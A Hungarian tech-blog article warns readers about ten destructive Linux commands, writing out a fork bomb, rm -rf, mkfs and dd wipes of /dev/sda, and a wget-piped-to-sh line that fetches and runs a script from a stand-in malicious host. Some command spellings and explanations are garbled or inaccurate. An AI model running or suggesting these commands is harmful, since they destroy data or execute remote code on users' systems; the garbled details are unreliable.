Technológia 360
  • Információs Technológia
    • Információtechnológiai Hírek
    • Utasítás
No Result
View All Result
  • Információs Technológia
    • Információtechnológiai Hírek
    • Utasítás
No Result
View All Result
Technológia 360
No Result
View All Result
Home Információs Technológia Információtechnológiai Hírek

10 legveszélyesebb Linux-parancs, amelyet soha nem szabad végrehajtania

by Balog Rajmund
2022.09.01
Share on FacebookShare on Twitter
10 legveszélyesebb Linux-parancs, amelyet soha nem szabad végrehajtania
10 legveszélyesebb Linux-parancs, amelyet soha nem szabad végrehajtania

Nos, ha valaha is használt Linux operációs rendszert, akkor tudhatja, hogy a platform függetlenebb, mint a Windows. A Linux nyílt forráskódú operációs rendszer, és elegendő szabadságot biztosít a felhasználók számára a különböző műveletek végrehajtásához. Az első felhasználók számára azonban a Linux üzemeltetése kihívást jelenthet.

Csakúgy, mint a Windows rendszeren, a Linuxon is sok terminálparancs található a különböző műveletek végrehajtásához. A Windowstól eltérően azonban a Linux nem kér megerősítést, ha olyan parancsot futtat, amely károsíthatja a rendszert. Ezért azt javasoljuk, hogy semmi áron ne használja ezeket a parancsokat.

10 legveszélyesebb Linux-parancs, amelyet soha nem szabad végrehajtania

Tehát ebben a cikkben megosztunk néhány veszélyes Linux-parancsot, amelyeket soha nem szabad futtatnia Linuxon. Tehát nézzük meg azokat a halálos parancsokat, amelyeket soha nem szabad futtatnia Linux számítógépen.

1. rm -rf

Az rm -rf parancs az egyik leggyorsabb módja a mappa és annak tartalmának törlésének. De egy kis gépelési hiba vagy tudatlanság helyrehozhatatlan károkat okozhat a rendszerben. Az rm paranccsal használt néhány beállítás olyan, mint az Rm -r parancs rekurzív módon törli a mappát, még az üres mappát is. Az rm -f parancs eltávolítja a „csak a fájl olvasását” kérés nélkül. Ezenkívül képes eltávolítani a gyökérkönyvtárban található összes fájlt.

2.: () {: |: &} ;:

A fenti parancs a villabomba. Úgy működik, hogy meghatároz egy ” ” nevű függvényt, amelyet kétszer hívnak meg, egyszer az előtérben és egyszer a háttérben. Újra és újra fut, amíg a rendszer le nem fagy.

3. command> / dev / sda

A fenti parancs a ‘command kimenetét a blokk / dev/sda fájlba írja. A fenti parancs nyers adatokat ír, és a blokkon lévő összes fájl lecserélődik nyers adatokra, ami teljes adatvesztést eredményez a blokkban.

4. mv directory / dev / null

Ez a parancs alapvetően áthelyezi az összes fájlt a / dev / null mappába, igen, ez azt jelenti, hogy egyszerűen eltünteti az összes fájlt a rendszerből.

5. wget http: // malicious_source -O | sh

A fenti parancs letölt egy szkriptet egy rosszindulatú forrásból, majd futtatja a rendszeren. A Wget parancs letölti a szkriptet, az sh parancs pedig futtatja a letöltött szkriptet a rendszeren.

6. Mkfs.ext3 / dev / sda

A fenti parancs egyszerűen formázza az ‘sda’ blokkot, és biztosan tudni fogja, hogy a fenti parancs futtatása után a blokk (merevlemez) visszaáll ÚJ értékre! Adatok nélkül, így a rendszer visszaállíthatatlan fázisban van.

7. > File

A fenti parancs a fájl tartalmának felszabadítására szolgál. Ha a fenti parancsot gépelési hibával vagy tudatlansággal hajtják végre, mivel a „> xt.conf” megírja a konfigurációs fájlt vagy bármely más rendszer- vagy konfigurációs fájlt.

8. ^ foo ^ bar

Ezzel a paranccsal az előző parancsot szerkesztheti anélkül, hogy újra be kellene gépelnie a teljes parancsot. De nagyon problémás lehet, ha nem kockáztatja meg az eredeti parancs változásának gondos ellenőrzését a ^ ^ foo bar paranccsal.

9. dd if = / dev / random of = / dev / sda

A fenti parancs a / dev / sda néven végződik, és véletlenszerű adatokat ír a blokkhoz. Természetesen! A rendszer inkonzisztens és helyreállíthatatlan fázisban maradna.

10. invisible Command

A következő parancs nem más, mint a cikk első parancsa (rm-rf). Itt a kódok hexadecimálisan vannak elrejtve, hogy egy tudatlan felhasználó becsapható. Futtassa az alábbi kódot a termináljába, és törölje a root partíciót.

Ez a parancs megmutatja, hogy a fenyegetés rejtett lehet, és általában néha észrevehetetlen. Tisztában kell lennie azzal, hogy mit csinál, és mi lesz az eredménye. Ne fordítson/futtasson kódot ismeretlen forrásból.

Tehát ezek azok a veszélyes Linux-parancsok, amelyeket el kell kerülni. Ezt a parancsot semmi áron nem szabad futtatnia. Remélem, ez a cikk segített Önnek! Oszd meg barátaiddal is.

Balog Rajmund

Balog Rajmund

Recommended.

KineMaster videó mentése

KineMaster videó mentése

2023.10.26
A Galaxy A35 teljes műszaki adatai és a megjelenési dátum a megjelenés előtt kiszivárgott

A Galaxy A35 teljes műszaki adatai és a megjelenési dátum a megjelenés előtt kiszivárgott

2024.03.03

Trending.

No Content Available

Technológia 360

Naprakész, pontos hírek és oktatás a technológiáról és a tudományról.

Categories

  • Információtechnológiai Hírek
  • Utasítás

Tags

AirPods Pro Android Apple azonosító Apple Intelligence Apple Maps Apple Music Apple Pay Facebook FaceTime Fotók alkalmazás Google térkép iCloud iMessage Instagram iOS 16 iOS 17 iOS 18 iOS 26 iPadOS 16 iPadOS 17 iPadOS 18 iPhone iPhone 14 Pro Max iPhone 16 iPhone 16 Pro iPhone alkalmazások iPhone háttérkép Közösségi média macOS Sequoia macOS Sonoma macOS Ventura Megjegyzések Siri Snapchat Szafari Sápadt Twitter Vision Pro Vélemények watchOS 9 watchOS 10 watchOS 11 WhatsApp Youtube üzenetek

Recent News

Felejtsd el a Csillagok háborúját: Ez a következő must-watch sci-fi film

Felejtsd el a Csillagok háborúját: Ez a következő must-watch sci-fi film

2025.07.04
Hogyan lehet letölteni az összes Galaxy S10 háttérképet

Hogyan lehet letölteni az összes Galaxy S10 háttérképet

2025.07.04
No Result
View All Result
  • Információs Technológia
    • Információtechnológiai Hírek
    • Utasítás